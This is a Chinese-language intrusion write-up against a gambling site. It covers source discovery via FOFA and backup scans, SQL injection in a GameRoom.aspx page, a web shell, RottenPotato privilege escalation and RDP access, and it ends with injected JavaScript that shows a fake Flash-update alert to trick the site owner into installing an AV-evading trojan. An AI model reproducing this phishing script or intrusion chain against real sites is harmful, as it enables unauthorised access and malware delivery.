背景
image.png背景简单信息收集
image.png
外网开放了两个web系统,80端口302跳转到app下载站,暂不考虑
9999端口:
image.png
.net+sqlserver+windows
将这个系统放到fofa上搜搜使用同一套系统的ip
image.png
PS:兄弟萌答应我下次fofa截图一定要把Content-Length: xxxx 打码好吗,每次都通过这个方式爆菊屡试不爽。
将这40多个站脱下来 批量扫一波备份先
image.png
拿到备份源码
image.png
api = 接口文件源码
Aw_Manager = 后台管理系统源码
经过长达五分钟的读代码,发现其api文件夹的GameRoom.aspx文件下的Page_Load方法存在一处sql注入 image.png
image.png
注入上线
image.png脱库进后台
image.png
问题不大 利用注入写的shell执行update语句
image.png
进后台
image.png各种玩法看的我眼花缭乱
image.png
登录后台 900+玩家 均为微信登录的该棋牌游戏
image.png
网站搭建者ip归属上海松江区(电信) 判断是家庭路由器外网ip 无溯源价值
登录RDP
烂土豆提权+通过注册表查询rdp端口被更改为39456
image.png
RDP登上去
image.png
flash钓鱼
在后台登陆成功后跳转的文件插入跳转js 跳转到事先准备好的假的flash更新页面
事先准备:免杀马一只 flash假域名一个(最好是包含有"flash"的字样)
<script>window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.baidu.com";</script>
效果:
输入账号密码登录
image.png
登录成功 弹框"您的FLASH版本过低,请尝试升级后访问改页面!",只能点击"确定"
image.png
点击"确认"跳转到事先伪造的flash更新页面网站,诱导该棋牌所有者下载点击
image.png
下载安装好我这边随即上线,取得对方PC控制权,并删除之前插入的跳转JS
(后续如何,下回分解)
网友评论